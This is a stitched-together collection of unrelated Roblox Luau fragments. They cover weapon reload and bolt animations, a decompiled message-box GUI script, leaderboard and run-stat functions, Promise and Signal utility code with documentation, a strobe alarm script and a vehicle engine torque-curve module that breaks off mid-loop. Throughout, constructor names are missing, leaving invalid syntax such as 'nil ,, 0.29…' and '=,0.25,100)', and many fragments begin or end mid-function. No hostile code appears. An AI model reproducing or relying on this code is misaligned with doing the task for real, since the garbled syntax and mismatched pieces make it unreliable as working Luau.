--// Animations
-- Idle Anim IdleAnim = function(char, speed, objs) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 1, 0, 0, 0, 1.19248806e-08, 1, 0, -1, 1.19248806e-08), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[3], nil ,, -2.0621779114, -1.67288721, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; -- FireMode Anim FireModeAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, 0, -0.0787199363, 0.962304771, 0.271973342, 0, -0.261981696, 0.926952124, -0.268561482, -0.0730415657, 0.258437991, 0.963262498), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.1) TweenJoint(objs[2], nil ,, -0.310947895, -1.34432662, 0.766044378, -2.80971371e-008, 0.642787576, -0.620885074, -0.258818865, 0.739942133, 0.166365519, -0.965925872, -0.198266774), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.25) objs[4]:WaitForChild("Click"):Play() end; -- Reload Anim ReloadAnim = function(char, speed, objs) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.5) TweenJoint(objs[3], nil ,, -0.0621779114, -1.63076854, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.5) wait(0.5) local MagC = Tool:WaitForChild("Mag"):clone() MagC:FindFirstChild("Mag"):Destroy() MagC.Parent = Tool MagC.Name = "MagC" local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = workspace.CurrentCamera:WaitForChild("Arms"):WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(objs[4].CFrame) objs[4].Transparency = 1 objs[6]:WaitForChild("MagOut"):Play() TweenJoint(objs[3], nil ,, -0.0621778965, -2.69811869, 0.787567914, -0.220087856, 0.575584888, -0.51537323, 0.276813388, 0.811026871, -0.337826759, -0.935379863, 0.104581922), function(X) return math.sin(math.rad(X)) end, 0.3) TweenJoint(objs[2], nil ,, 0.295501232, -1.29060709, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.1) wait(0.1) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.3) objs[6]:WaitForChild('MagIn'):Play() TweenJoint(objs[3], nil ,, -0.0621779114, -1.63076854, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.4) MagC:Destroy() objs[4].Transparency = 0 TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.98480773, -0.171010077, -0.0301536508, 0, -0.173647955, 0.984807789, -0.173648179, -0.969846308, -0.171009853), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.3) objs[7].Parent:WaitForChild('BoltForward'):Play() TweenJoint(objs[7], nil ,, function(X) return math.sin(math.rad(X)) end, 0.03) TweenJoint(objs[2], nil ,, 0.395501226, -1.07592201, 0.98480773, -0.171010077, -0.0301536508, 0, -0.173647955, 0.984807789, -0.173648179, -0.969846308, -0.171009853), function(X) return math.sin(math.rad(X)) end, 0.1) wait(0.15) end; -- Bolt Anim BoltBackAnim = function(char, speed, objs) TweenJoint(objs[3], nil ,, 0.518400908, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.1) TweenJoint(objs[2], nil ,, -0.492658436, -1.55705214, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.4) objs[5]:WaitForChild("BoltBack"):Play() TweenJoint(objs[2], nil ,, -0.609481037, -1.02827215, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[1], nil ,, 0, 0.230707675, 1, 0, 0, 0, 1, 0, 0, 0, 1), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[3], nil ,, 0.175939053, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.3) end; BoltForwardAnim = function(char, speed, objs) objs[5]:WaitForChild("BoltForward"):Play() TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.1) TweenJoint(objs[2], nil ,, -0.900531948, -0.749261618, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.1) TweenJoint(objs[3], nil ,, 0.617181182, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.2) wait(0.2) end; -- Bolting Back BoltingBackAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, 0, 0.230707675, 1, 0, 0, 0, 1, 0, 0, 0, 1), function(X) return math.sin(math.rad(X)) end, 0.03) end; BoltingForwardAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.1) end; InspectAnim = function(char, speed, objs) ts:Create(objs[1],,{C1 =, 0.654529691, -1.92835355, 0.999723792, 0.0109803826, 0.0207702816, -0.0223077796, 0.721017241, 0.692557871, -0.00737112388, -0.692829967, 0.721063137)}):Play() ts:Create(objs[2],,{C1 =, -0.699174881, -1.32277012, 0.66716975, -8.8829113e-09, -0.74490571, 0.651565909, -0.484672248, 0.5835706, -0.361035138, -0.874695837, -0.323358655)}):Play() wait(1) ts:Create(objs[2],,{C1 =, -0.699174881, -1.03685927, -0.204235911, 0.62879771, 0.750267386, 0.65156585, -0.484672219, 0.58357054, 0.730581641, 0.60803473, -0.310715646)}):Play() wait(1) ts:Create(objs[2],,{C1 =, 0.295501232, -1.32277012, 0.935064793, -0.354476899, 4.22709467e-09, -0.110443868, -0.291336805, 0.950223684, -0.336832345, -0.888520718, -0.311568588)}):Play() ts:Create(objs[1],,{C1 =, 0.654529572, -1.81345785, 0.761665463, -0.514432132, 0.393986136, -0.560285628, -0.217437655, 0.799250066, -0.325492471, -0.82950604, -0.453843832)}):Play() wait(1) local MagC = Tool:WaitForChild("Mag"):clone() MagC:FindFirstChild("Mag"):Destroy() MagC.Parent = Tool MagC.Name = "MagC" local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = workspace.CurrentCamera:WaitForChild("Arms"):WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(Tool:WaitForChild('Mag').CFrame) Tool.Mag.Transparency = 1 Tool:WaitForChild('Grip'):WaitForChild("MagOut"):Play() ts:Create(objs[2],,{C1 =, 0.295501232, -1.55972552, 0.935064793, -0.354476899, 4.22709467e-09, -0.110443868, -0.291336805, 0.950223684, -0.336832345, -0.888520718, -0.311568588)}):Play() ts:Create(objs[1],,{C1 =, 0.654529572, -2.9755671, 0.761665463, -0.514432132, 0.393986136, -0.568886042, -0.239798605, 0.786679745, -0.31021595, -0.823320091, -0.475299776)}):Play() wait(0.13) ts:Create(objs[2],,{C1 =, 0.295501232, -1.28149843, 0.935064793, -0.354476899, 4.22709467e-09, -0.110443868, -0.291336805, 0.950223684, -0.336832345, -0.888520718, -0.311568588)}):Play() wait(0.20) ts:Create(objs[1],,{C1 =, -0.650498748, -1.82401526, 0.761665463, -0.514432132, 0.393986136, -0.646156013, -0.55753684, 0.521185875, -0.0484529883, -0.651545882, -0.75706023)}):Play() wait(0.8) ts:Create(objs[1],,{C1 =, 0.654529572, -2.9755671, 0.761665463, -0.514432132, 0.393986136, -0.568886042, -0.239798605, 0.786679745, -0.31021595, -0.823320091, -0.475299776)}):Play() wait(0.5) Tool:WaitForChild('Grip'):WaitForChild("MagIn"):Play() ts:Create(objs[1],,{C1 =, 0.654529572, -1.81345785, 0.761665463, -0.514432132, 0.393986136, -0.560285628, -0.217437655, 0.799250066, -0.325492471, -0.82950604, -0.453843832)}):Play() wait(0.3) MagC:Destroy() Tool.Mag.Transparency = 0 wait(0.1) end; AttachAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, -0.386312962, -0.955676377, 0.5, 0, -0.866025329, 0.852868497, -0.17364797, 0.492403895, -0.150383547, -0.984807789, -0.086823985), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[2], nil ,, 1.66565645, -1.2231313, 0.787567914, -0.220087856, 0.575584888, -0.0180282295, 0.925416708, 0.378521889, -0.615963817, -0.308488399, 0.724860728), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; -- Patrol Anim PatrolAnim = function(char, speed, objs) TweenJoint(objs[1], nil , sConfig.PatrolPosR, function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[2], nil , sConfig.PatrolPosL, function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; } return Settings
-- Decompiled with the Synapse X Luau decompiler.
client = nil; cPcall = nil; Pcall = nil; Routine = nil; service = nil; return function(p1) local l__Parent__1 = script.Parent.Parent; local l__Frame__2 = l__Parent__1.Frame; local l__Frame__3 = l__Frame__2.Frame; local l__Message__4 = l__Frame__3.Message; local l__Title__5 = l__Frame__3.Title; local l__Left__6 = l__Frame__3.Left; local l__gIndex__7 = p1.gIndex; local l__gTable__8 = p1.gTable; local l__Message__9 = p1.Message; local l__Scroll__10 = p1.Scroll; local l__Time__11 = p1.Time; if not p1.Message or not p1.Title then l__gTable__8:Destroy(); end; l__Title__5.Text = p1.Title; l__Message__4.Text = l__Message__9; l__Title__5.TextTransparency = 1; l__Message__4.TextTransparency = 1; l__Title__5.TextStrokeTransparency = 1; l__Message__4.TextStrokeTransparency = 1; l__Frame__2.BackgroundTransparency = 1; local u1 = false; local function u2() if not u1 then u1 = true; for v12 = 1, 20 do if l__Message__4.TextTransparency < 1 then l__Message__4.TextTransparency = l__Message__4.TextTransparency + 0.8; l__Title__5.TextTransparency = l__Title__5.TextTransparency + 0.8; end; if l__Message__4.TextStrokeTransparency < 1 then l__Message__4.TextStrokeTransparency = l__Message__4.TextStrokeTransparency + 0.9; l__Title__5.TextStrokeTransparency = l__Title__5.TextStrokeTransparency + 0.9; end; if l__Frame__2.BackgroundTransparency < 1 then l__Frame__2.BackgroundTransparency = l__Frame__2.BackgroundTransparency + 0.015; l__Frame__3.BackgroundTransparency = l__Frame__2.BackgroundTransparency; end; service.Wait("Stepped"); end; service.UnWrap(l__Parent__1):Destroy(); end; end; function l__gTable__8.CustomDestroy() u2(); end; (function() l__gTable__8:Ready(); for v13 = 1, 20 do if l__Message__4.TextTransparency > 0 then l__Message__4.TextTransparency = l__Message__4.TextTransparency - 0.8; l__Title__5.TextTransparency = l__Title__5.TextTransparency - 0.8; end; if l__Frame__2.BackgroundTransparency > 0 then l__Frame__2.BackgroundTransparency = l__Frame__2.BackgroundTransparency - 0.06; l__Frame__3.BackgroundTransparency = l__Frame__2.BackgroundTransparency; end; service.Wait("Stepped"); end; end)(); if not l__Time__11 then local v14, v15 = l__Message__9:gsub(" ", ""); local v16 = math.clamp(v15 / 2, 4, 11) + 1; l__Left__6.Text = "[" .. v16 .. "]"; for v17 = v16, 1, -1 do if not l__Left__6 then break; end; l__Left__6.Text = "[" .. v17 .. "]"; wait(1); end; else l__Left__6.Text = "[" .. l__Time__11 .. "]"; for v18 = l__Time__11, 1, -1 do if not l__Left__6 then break; end; l__Left__6.Text = "[" .. v18 .. "]"; wait(1); end; end; l__Left__6.Text = "[Closing]"; wait(0.3); if not u1 then u2(); end; end;
--For R15 avatars
Animations = { R15Slash = 522635514, R15Lunge = 522638767 } Damage = DamageValues.BaseDamage Grips = { Up =, 0, -1.70000005, 0, 0, 1, 1, 0, 0, 0, 1, 0), Out =, 0, -1.70000005, 0, 1, 0, 1, -0, 0, 0, 0, -1) } Sounds = { Slash = Handle:WaitForChild("SwordSlash"), Lunge = Handle:WaitForChild("SwordLunge"), Unsheath = Handle:WaitForChild("Unsheath") } ToolEquipped = false
local players = game:GetService("Players") local replicatedStorage = game:GetService("ReplicatedStorage") local remotes = replicatedStorage:WaitForChild("Remotes", 60) local sendFeed = remotes:WaitForChild("SendFeed", 60)
-- print("Keyframe : ".. frameName)
playToolAnimation(toolAnimName, 0.0, Humanoid) end end function playToolAnimation(animName, transitionTime, humanoid) local roll = math.random(1, animTable[animName].totalWeight) local origRoll = roll local idx = 1 while roll > animTable[animName][idx].weight do roll = roll - animTable[animName][idx].weight idx = idx + 1 end
-- light script
local clicks = 0 script.Parent.ClickDetector.MouseClick:Connect(function(clicked) if clicked then clicks = clicks + 1 if clicks == 1 then script.Parent.Light.PointLight.Enabled = true elseif clicks == 2 then script.Parent.Light.PointLight.Enabled = false clicks = clicks - 2 end end end)
-- Setup animation objects
function scriptChildModified(child) local fileList = animNames[child.Name] if (fileList ~= nil) then configureAnimationSet(child.Name, fileList) end end script.ChildAdded:connect(scriptChildModified) script.ChildRemoved:connect(scriptChildModified)
-- Leaderboard
function loadLeaderstats(player) local stats ="IntValue") stats.Name = "leaderstats" local highScore ="IntValue") highScore.Name = "High Score" highScore.Parent = stats highScore.Value = 0 local currentScore ="IntValue") currentScore.Name = "Score" currentScore.Parent = stats stats.Parent = player end function initialiseRunStats(player) if player:FindFirstChild("RunStats") then player.RunStats.Distance.Value = 0 player.RunStats.CoinsCollected.Value = 0 end end function showResults(player) local resultsGUI = game.ServerStorage.GUIs.PostRunGUI:Clone() resultsGUI.Frame.DistanceValue.Text = player.RunStats.Distance.Value resultsGUI.Frame.CoinsValue.Text = player.RunStats.CoinsCollected.Value resultsGUI.Frame.ScoreValue.Text = player.leaderstats.Score.Value resultsGUI.Parent = player.PlayerGui return resultsGUI end function initialiseNewRun(player, delayTime, charExpected, showLastResults) if not path then while not path do wait() end end local lastResultsGUI = nil if showLastResults then lastResultsGUI = showResults(player) end if delayTime ~= 0 then wait(delayTime) end if lastResultsGUI ~= nil then lastResultsGUI:Destroy() end if player and player.Parent then -- charExpected is needed to avoid calling LoadCharacter on players leaving the game if player.Character or charExpected == false then player:LoadCharacter() initialiseRunStats(player) local playersPath = path() lastActivePath[player.Name] = playersPath playersPath:init(player.Name) end end end
--Equip Funciton
tool.Equipped:connect(function() --Equip Function 1 if color.Enabled == false then tool.TheWorld.Playing = true end end)
-- Start a loop to continuously check for search text changes
spawn(function() while true do onSearchTextChanged() wait(3) -- Adjust the wait time as needed end end)
-- ==================== -- BULLET VISUALIZER -- Enabled the gun to display a fake travelling bullet -- ====================
VisualizerEnabled = true; BulletSpeed = 25; BulletSize =,0.25,100); BulletColor ="Bright yellow"); BulletTransparency = 0.25; BulletMaterial = Enum.Material.SmoothPlastic; FadeTime = 0.25; --Only work when bullet travel instantly. For this, you have to set BulletSpeed to "math.huge"
-- services
local Workspace = game:GetService("Workspace") local Players = game:GetService("Players") local TweenService = game:GetService("TweenService") local Debris = game:GetService("Debris")
--[=[ Converts an event into a Promise which resolves the next time the event fires. The optional `predicate` callback, if passed, will receive the event arguments and should return `true` or `false`, based on if this fired event should resolve the Promise or not. If `true`, the Promise resolves. If `false`, nothing happens and the predicate will be rerun the next time the event fires. The Promise will resolve with the event arguments. :::tip This function will work given any object with a `Connect` method. This includes all Roblox events. ::: ```lua -- Creates a Promise which only resolves when `somePart` is touched -- by a part named `"Something specific"`. return Promise.fromEvent(somePart.Touched, function(part) return part.Name == "Something specific" end) ``` @since 3.0.0 @param event Event -- Any object with a `Connect` method. This includes all Roblox events. @param predicate? (...: P) -> boolean -- A function which determines if the Promise should resolve with the given value, or wait for the next event to check again. @return Promise<P> ]=]
function Promise.fromEvent(event, predicate) predicate = predicate or function() return true end return Promise._new(debug.traceback(nil, 2), function(resolve, _, onCancel) local connection local shouldDisconnect = false local function disconnect() connection:Disconnect() connection = nil end -- We use shouldDisconnect because if the callback given to Connect is called before -- Connect returns, connection will still be nil. This happens with events that queue up -- events when there's nothing connected, such as RemoteEvents connection = event:Connect(function(...) local callbackValue = predicate(...) if callbackValue == true then resolve(...) if connection then disconnect() else shouldDisconnect = true end elseif type(callbackValue) ~= "boolean" then error("Promise.fromEvent predicate should always return a boolean") end end) if shouldDisconnect and connection then return disconnect() end onCancel(disconnect) end) end
--[=[ @param player Player Clears the custom property value for the given player. When this occurs, the player will reset to use the top-level value held by this property (either the value set when the property was created, or the last value set by `Set`). ```lua remoteProperty:Set("DATA") remoteProperty:SetFor(somePlayer, "CUSTOM_DATA") print(remoteProperty:GetFor(somePlayer)) --> "CUSTOM_DATA" -- DOES NOT CLEAR, JUST SETS CUSTOM DATA TO NIL: remoteProperty:SetFor(somePlayer, nil) print(remoteProperty:GetFor(somePlayer)) --> nil -- CLEAR: remoteProperty:ClearFor(somePlayer) print(remoteProperty:GetFor(somePlayer)) --> "DATA" ``` ]=]
function RemoteProperty:ClearFor(player: Player) if self._perPlayer[player] == nil then return end self._perPlayer[player] = nil self._rs:Fire(player, self._value) end
-- Format params: methodName, ctorName
local ERR_NOT_INSTANCE = "Cannot statically invoke method '%s' - It is an instance method. Call it on an instance of this class created via %s" function Signal return setmetatable({ Connections = {} }, SignalStatic) end local function NewConnection(sig: Signal, func: any): Connection return setmetatable({ Signal = sig, Delegate = func, Index = -1 }, ConnectionStatic) end function SignalStatic:Connect(func) assert(getmetatable(self) == SignalStatic, ERR_NOT_INSTANCE:format("Connect", "")) local connection = NewConnection(self, func) connection.Index = #self.Connections + 1 table.insert(self.Connections, connection.Index, connection) return connection end function SignalStatic:Fire(...) assert(getmetatable(self) == SignalStatic, ERR_NOT_INSTANCE:format("Fire", "")) local args = table.pack(...) local allCons = self.Connections for index = 1, #allCons do local connection = allCons[index] if connection.Delegate ~= nil then -- Catch case for disposed signals. coroutine.wrap(function () connection.Delegate(table.unpack(args)) end)() end end end function SignalStatic:FireSync(...) assert(getmetatable(self) == SignalStatic, ERR_NOT_INSTANCE:format("Fire", "")) local args = table.pack(...) local allCons = self.Connections for index = 1, #allCons do local connection = allCons[index] if connection.Delegate ~= nil then -- Catch case for disposed signals. connection.Delegate(table.unpack(args)) end end end function SignalStatic:Dispose() assert(getmetatable(self) == SignalStatic, ERR_NOT_INSTANCE:format("Dispose", "")) local allCons = self.Connections for index = 1, #allCons do allCons[index]:Disconnect() end self.Connections = {} setmetatable(self, nil) end function ConnectionStatic:Disconnect() assert(getmetatable(self) == ConnectionStatic, ERR_NOT_INSTANCE:format("Disconnect", "private function NewConnection()")) table.remove(self.Signal.Connections, self.Index) self.SignalStatic = nil self.Delegate = nil self.Index = -1 setmetatable(self, nil) end return SignalStatic
--- Creates an alias command
function Util.MakeAliasCommand(name, commandString) local commandName, commandDescription = unpack(name:split("|")) local args = {} commandString = Util.EncodeEscapedOperators(commandString) local seenArgs = {} for arg in commandString:gmatch("$(%d+)") do if seenArgs[arg] == nil then seenArgs[arg] = true local options = commandString:match("$" .. arg .. "(%b{})") local argType, argName, argDescription if options then options = options:sub(2, #options-1) -- remove braces argType, argName, argDescription = unpack(options:split("|")) end argType = argType or "string" argName = argName or ("Argument " .. arg) argDescription = argDescription or "" table.insert(args, { Type = argType; Name = argName; Description = argDescription; }) end end return { Name = commandName, Aliases = {}, Description = "<Alias> " .. (commandDescription or commandString), Group = "UserAlias", Args = args, Run = function(context) return Util.RunCommandString(context.Dispatcher, Util.SubstituteArgs(commandString, context.RawArguments)) end } end
-- --If you are only going to be requiring this from the server you can require by its asset ID.
local Signal = require(script:WaitForChild("Signal")) local RunService = game:GetService("RunService")
-- Visualizes a ray. This will not run if FastCast.VisualizeCasts is false.
function DbgVisualizeSegment(castStartCFrame: CFrame, castLength: number): ConeHandleAdornment? if FastCast.VisualizeCasts ~= true then return nil end local adornment ="ConeHandleAdornment") adornment.Adornee = workspace.Terrain adornment.CFrame = castStartCFrame adornment.Height = castLength adornment.Color3 = adornment.Radius = 0.25 adornment.Transparency = 0.5 adornment.Parent = GetFastCastVisualizationContainer() return adornment end
--new magazine in, let's get to pushing that pull, kick thing back in its place...
wait() weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(304), -0.14, math.rad(-82)) wait() weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(302), -0.14, math.rad(-84)) Tool.Handle.Reload.Pitch = 0.95 wait() weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(300), -0.14, math.rad(-86)) wait() weld33.C1 =, 0.5, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-111), math.rad(-2),0.2) weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(298), -0.08, math.rad(-88)) wait() weld33.C1 =, 0.5, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-108), math.rad(-4),0.1) weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(296), -0.02, math.rad(-90)) wait() weld33.C1 =, 0.5, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-105), math.rad(-6),0) weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(294), 0.04, math.rad(-90)) wait() weld33.C1 =, 0.6, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-103), math.rad(-8),0) weld55.C1 =, 0.3, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(292), 0.1, math.rad(-90)) wait() weld33.C1 =, 0.7, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-99), math.rad(-10),0) weld55.C1 =, 0.3, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.16, math.rad(-90)) wait() weld33.C1 =, 0.8, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-96), math.rad(-12.5),0) weld55.C1 =, 0.3, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) wait() weld33.C1 =, 0.9, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-93), math.rad(-15),0) weld55.C1 =, 0.3, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.28, math.rad(-90))
-- Teknikk Strobe Core V1 --
local Status = script.Parent.Parent.Status local StrobeSync = script.Parent.Parent.StrobeSync local Run = false Status.Changed:connect(function() if Run then return end Run = true if Status.Value == 1 --ALARM&STROBE or Status.Value == 2 --STROBE or Status.Value == 11 --TEST then wait(1) while true do wait(1.5) StrobeSync.Value = true wait(0.1) StrobeSync.Value = false end end end) StrobeSync.Value = false
--[[ Roblox Services ]]
-- local Players = game:GetService("Players") local RunService = game:GetService("RunService") local UserInputService = game:GetService("UserInputService") local GuiService = game:GetService("GuiService") local Workspace = game:GetService("Workspace") local UserGameSettings = UserSettings():GetService("UserGameSettings") local VRService = game:GetService("VRService")
local fFD = _Tune.FinalDrive local fFDr = fFD*30/math.pi local wDRatio = wDia*math.pi/60 local cfWRot = CFrame.Angles(math.pi/2,-math.pi/2,0) local cfYRot = CFrame.Angles(0,math.pi,0) --Electric Only Setup if not _Tune.Engine and _Tune.Electric then _Tune.Redline = _Tune.E_Redline _Tune.PeakRPM = _Tune.E_Trans2 _Tune.Turbochargers = 0 _Tune.Superchargers = 0 _Tune.Clutch = false _Tune.IdleRPM = 0 _Tune.AutoShiftType = "DCT" _Tune.ShiftUpTime = 0.1 _Tune.ShiftDnTime = 0.1 end --Aspiration Setup _TCount = _Tune.Turbochargers _TPsi = _Tune.T_Boost*_Tune.Turbochargers _SCount = _Tune.Superchargers _SPsi = _Tune.S_Boost*_Tune.Superchargers --Engine Curve local HP_M = _Tune.Horsepower local HP_T = HP_M*(((_TPsi*(_Tune.T_Efficiency/10))/7.5)/2) local HP_S = HP_M*(((_SPsi*(_Tune.S_Efficiency/10))/7.5)/2) local PK_H, PK_T = _Tune.PeakRPM, _Tune.MT_PeakRPM local MC_H, MC_T = _Tune.MH_CurveMult, _Tune.MT_CurveMult local TC_H, TC_T = _Tune.TH_CurveMult, _Tune.TT_CurveMult local SC_H, SC_T = _Tune.SH_CurveMult, _Tune.ST_CurveMult local MP_H, MP_T = _Tune.MH_PeakSharp, _Tune.MT_PeakSharp local TP_H, TP_T = _Tune.TH_PeakSharp, _Tune.TT_PeakSharp local SP_H, SP_T = _Tune.SH_PeakSharp, _Tune.ST_PeakSharp local V_MT = {HP_M,PK_H,MC_H,MP_H,PK_T,MC_T,MP_T} local V_TC = {HP_T,PK_H,TC_H,TP_H,PK_T,TC_T,TP_T} local V_SC = {HP_S,PK_H,SC_H,SP_H,PK_T,SC_T,SP_T} function getCurve(RPM,HP,Peak,CurveMult,Sharpness) RPM=RPM/1000 HP=HP/100 Peak=Peak/1000 return ((-(RPM-Peak)^2)*math.min(HP/(Peak^2),CurveMult^(Peak/HP))+HP)*(RPM-((RPM^Sharpness)/(Sharpness*Peak^(Sharpness-1)))) end function getPeak(V) local HP,Peak_H,CurveMult_H,Sharpness_H,Peak_T,CurveMult_T,Sharpness_T=V[1]/100,V[2]/1000,V[3],V[4],V[5]/1000,V[6],V[7] local hp=((-(Peak_H-Peak_H)^2)*math.min(HP/(Peak_H^2),CurveMult_H^(Peak_H/HP))+HP)*(Peak_H-((Peak_H^Sharpness_H)/(Sharpness_H*Peak_H^(Sharpness_H-1)))) local tq=((-(Peak_T-Peak_T)^2)*math.min(HP/(Peak_T^2),CurveMult_T^(Peak_T/HP))+HP)*(Peak_T-((Peak_T^Sharpness_T)/(Sharpness_T*Peak_T^(Sharpness_T-1)))) return hp, tq end local PeakHP_N, PeakTQ_N = getPeak(V_MT) local PeakHP_T, PeakTQ_T = getPeak(V_TC) local PeakHP_S, PeakTQ_S = getPeak(V_SC) --Plot Current Horsepower function EngineCurve(x,gear,V,eq,peakhp,peaktq) local hp,peak_h,cm_h,sharp_h,peak_t,cm_t,sharp_t=V[1],V[2],V[3],V[4],V[5],V[6],V[7] local hp_r=(math.max(getCurve(x,hp,peak_h,cm_h,sharp_h)/(peakhp/hp),0)) local tq_r=(math.max(getCurve(x,hp,peak_t,cm_t,sharp_t)/(peaktq/hp),0)) return hp_r,((tq_r*(eq/x))*_Tune.Ratios[gear+1]*fFD*hpScaling) end --Electric Curve local EHP=_Tune.E_Horsepower/100 local ETQ=_Tune.E_Torque/100 local ETrans1=_Tune.E_Trans1/1000 local ETrans2=_Tune.E_Trans2/1000 local ELimit=_Tune.E_Redline/1000 function elecHP(RPM) RPM=RPM/1000 local retVal=1e-9 if RPM<=ETrans1 then retVal=((((RPM/ETrans1)^_Tune.EH_FrontMult)/(1/EHP))*(RPM/ETrans1))+((((RPM/ETrans1)^(1/_Tune.EH_FrontMult))/(1/EHP))*(1-(RPM/ETrans1))) elseif ETrans1<RPM and RPM<ETrans2 then retVal=EHP elseif ETrans2<=RPM then retVal=EHP-(((RPM-ETrans2)/(ELimit-ETrans2))^_Tune.EH_EndMult)/(1/(EHP*(_Tune.EH_EndPercent/100))) else error( "\n\t [NCT: M]: Drive initialization failed!" .."\n\t An unknown error occured when initializing electric horsepower." .."\n\t Please send a screenshot of this message to Avxnturador." .."\n\t R: "..RPM..", T1: "..ETrans1", T2: "..ETrans2", L: "..ELimit".") end return retVal end function elecTQ(RPM) RPM=RPM/1000 local retVal=1e-9 if RPM<ETrans1 then retVal=ETQ elseif ETrans1<=RPM then retVal=ETQ-(((RPM-ETrans1)/(ELimit-ETrans1))^_Tune.ET_EndMult)/(1/(ETQ*(_Tune.ET_EndPercent/100))) else error( "\n\t [NCT: M]: Drive initialization failed!" .."\n\t An unknown error occured when initializing electric torque." .."\n\t Please send a screenshot of this message to Avxnturador." .."\n\t R: "..RPM..", T1: "..ETrans1", T2: "..ETrans2", L: "..ELimit".") end return retVal end --Plot Current Electric Horsepower function ElecCurve(x,gear) local hp=(math.max(elecHP(x),0))*100 local tq=(math.max(elecTQ(x),0))*100 if gear~=0 then return hp,math.max(tq*_Tune.Ratios[gear+1]*fFD*hpScaling,0) else return 0,0 end end --Output Cache local NCache = {} local ECache = {} local TCache = {} local SCache = {} for gear,ratio in pairs(_Tune.Ratios) do local nhpPlot = {} local ehpPlot = {} local thpPlot = {} local shpPlot = {} for rpm = 0, math.ceil((_Tune.Redline+100)/100) do local ntqPlot = {} local etqPlot = {} local ttqPlot = {} local stqPlot = {} if rpm~=0 then if _Tune.Engine then ntqPlot.Horsepower,ntqPlot.Torque = EngineCurve(rpm*100,gear-1,V_MT,_Tune.M_EqPoint,PeakHP_N,PeakTQ_N) if _TCount~=0 then ttqPlot.Horsepower,ttqPlot.Torque = EngineCurve(rpm*100,gear-1,V_TC,_Tune.M_EqPoint,PeakHP_T,PeakTQ_T) else ttqPlot.Horsepower,ttqPlot.Torque = 0,0 end if _SCount~=0 then stqPlot.Horsepower,stqPlot.Torque = 